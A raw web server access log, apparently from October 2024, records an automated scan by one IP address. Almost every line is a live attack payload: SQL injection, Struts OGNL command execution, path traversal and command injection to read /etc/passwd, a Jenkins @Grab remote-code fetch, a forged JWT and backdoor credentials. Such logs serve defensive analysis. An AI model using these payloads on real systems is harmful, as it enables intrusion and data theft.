195.164.49.69 - - [20/Oct/2024:18:30:53 +0000] GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:30:55 +0000] GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:18:30:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:00 +0000] GET /file-manager/ HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:31:01 +0000] POST /file-manager/backend/makefile HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:31:03 +0000] POST /file-manager/backend/text HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:31:05 +0000] POST /file-manager/backend/permissions HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:31:07 +0000] GET /xbWndDu3xr.php HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:31:10 +0000] POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272niERNdjjH9mewDYymqIQvtOMYM%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+IpAddress=%27195.164.49.69%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272niERNdjjH9mewDYymqIQvtOMYM%27%23 HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:18:31:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:17 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:31:20 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:31:23 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:18:31:25 +0000] GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:27 +0000] GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:18:31:29 +0000] POST /ajax/ticket_user_db.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:31:30 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:33 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:31:34 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:31:36 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
- - - [20/Oct/2024:18:31:38 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:31:40 +0000] GET /WebInterface/ HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:31:44 +0000] GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:46 +0000] GET /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:31:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:53 +0000] GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:18:31:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:31:59 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:18:32:01 +0000] GET /N0t4xist*~1*/a.aspx HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:18:32:03 +0000] GET /*~1*/a.aspx HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:32:05 +0000] OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [20/Oct/2024:18:32:07 +0000] OPTIONS /*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [20/Oct/2024:18:32:17 +0000] GET /qZ050F HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:18:32:18 +0000] GET /heapdump HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:32:20 +0000] GET /actuator/heapdump HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:32:22 +0000] POST /ocpu/library/base/R/do.call/json HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:18:32:26 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:18:32:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:32:30 +0000] POST /adminPage/remote/cmdOver HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:18:32:32 +0000] POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:32:39 +0000] POST /admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:32:41 +0000] POST /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:32:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:32:57 +0000] GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 404 1577
195.164.49.69 - - [20/Oct/2024:18:32:59 +0000] GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:18:33:01 +0000] GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:18:33:03 +0000] GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:18:33:05 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [20/Oct/2024:18:33:06 +0000] GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:33:08 +0000] GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:18:33:10 +0000] GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:18:33:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:33:14 +0000] GET /secure/ContactAdministrators!default.jspa HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:18:33:16 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:33:17 +0000] GET /api/index.php/v1/config/application?public=true HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:18:33:19 +0000] GET /api/v1/config/application?public=true HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:33:22 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:33:23 +0000] GET /cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:33:25 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:33:27 +0000] GET /?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:33:29 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:33:31 +0000] GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:18:33:33 +0000] GET /cacti/cmd_realtime.php?1+1&&id=1+1+1 HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:33:35 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:18:33:36 +0000] OPTIONS / HTTP/1.1 200 -
195.164.49.69 - - [20/Oct/2024:18:33:38 +0000] GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1 404 1172
195.164.49.69 - - [20/Oct/2024:18:33:41 +0000] GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:18:33:43 +0000] GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1 400 1169
- - - [20/Oct/2024:18:33:44 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:33:46 +0000] GET /inventory HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:33:48 +0000] GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:18:33:52 +0000] GET /grid/console HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:33:53 +0000] GET /console HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:33:55 +0000] GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:33:57 +0000] GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBtZDUoOTk5OTk5OTk5KTs=%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:18:33:59 +0000] GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:34:03 +0000] GET /web_cste/cgi-bin/product.ini HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:18:34:05 +0000] GET /nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:34:06 +0000] GET /v1/auth/users?pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:34:09 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:18:34:11 +0000] GET /resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf HTTP/1.1 404 1145
195.164.49.69 - - [20/Oct/2024:18:34:13 +0000] GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:18:34:15 +0000] GET /admin/elfinder/elfinder-cke.html HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:34:17 +0000] GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:18:34:19 +0000] GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:18:34:20 +0000] GET /assets/elFinder/elfinder.html HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:34:22 +0000] GET /backend/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:34:24 +0000] GET /elfinder/elfinder-cke.html HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:34:26 +0000] GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:18:34:28 +0000] GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:18:34:30 +0000] GET /uploads/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:34:32 +0000] GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:34:34 +0000] GET /' HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:18:34:35 +0000] GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:34:37 +0000] GET /jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:18:34:39 +0000] GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:18:34:41 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:34:42 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:34:45 +0000] GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:18:34:47 +0000] GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:34:48 +0000] GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:34:52 +0000] GET /Admin/Admin.aspx HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:34:54 +0000] GET /free_time.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:34:56 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:34:59 +0000] POST /seeyon/htmlofficeservlet HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:35:01 +0000] GET /seeyon/test123456.jsp?pwd=asasd3344&2niI6tiEPHMYvTRYRgmgRFpjF8l=ipconfig HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:35:05 +0000] GET /cgi-bin/test.cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:35:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:35:07 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:35:35 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:18:35:39 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [20/Oct/2024:18:35:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:36:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:36:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:36:05 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:18:36:07 +0000] POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:18:36:08 +0000] GET /talari/app/files/2niI6yrULBvzS599QgzEIIFtGGg HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:18:36:28 +0000] GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:18:36:30 +0000] GET /2niI6wSdyGrPiffPhbTfYyUUFzw/../../ThinVnc.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:18:36:32 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:36:34 +0000] POST /_async/AsyncResponseService HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:36:35 +0000] GET /_async/favicon.ico HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:37:24 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:37:25 +0000] POST /cgi-bin/login.cgi HTTP/1.1 404 1095
83.212.98.101 - - [20/Oct/2024:18:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:37:32 +0000] GET /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:37:33 +0000] GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:37:33 +0000] POST /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:37:39 +0000] POST /forgot_password.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:38:01 +0000] GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:38:03 +0000] GET /ext-js/index.html HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:38:23 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:38:24 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:39:05 +0000] POST /auth/newpassword HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:39:29 +0000] POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:18:39:31 +0000] POST /lucee/admin/imgProcess.cfm?file=/../../../context/2niI6sAJ8boG8KgrhRGin1JeToK.cfm HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:18:39:33 +0000] POST /lucee/2niI6sAJ8boG8KgrhRGin1JeToK.cfm HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:18:39:55 +0000] GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:39:56 +0000] GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 404 1150
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:18:40:17 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:18:40:18 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:40:18 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:40:18 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:18:40:18 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:40:18 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:18:40:18 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:18:40:39 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:18:40:41 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:18:40:42 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:40:44 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
83.212.98.101 - - [20/Oct/2024:18:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:41:43 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:41:58 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:42:20 +0000] POST /?rest_route=/olistener/new HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:42:22 +0000] GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:18:42:24 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
83.212.98.101 - - [20/Oct/2024:18:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:42:55 +0000] GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:43:10 +0000] GET /modules/appagebuilder/config.xml HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:43:12 +0000] POST /modules/appagebuilder/apajax.php?rand=4120776515056 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:43:14 +0000] POST /modules/appagebuilder/apajax.php?rand=3353250469836 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:43:16 +0000] POST /modules/appagebuilder/apajax.php?rand=243628052761 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:43:57 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:43:59 +0000] GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1 404 1153
195.164.49.69 - - [20/Oct/2024:18:44:03 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:44:11 +0000] POST /geoserver/wms HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:44:34 +0000] POST /classes/Master.php?f=delete_item HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:44:56 +0000] GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:45:11 +0000] GET /ws-api/v2/users/me/details?token=02 HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:45:13 +0000] POST /webapi/auth HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:45:15 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:45:17 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
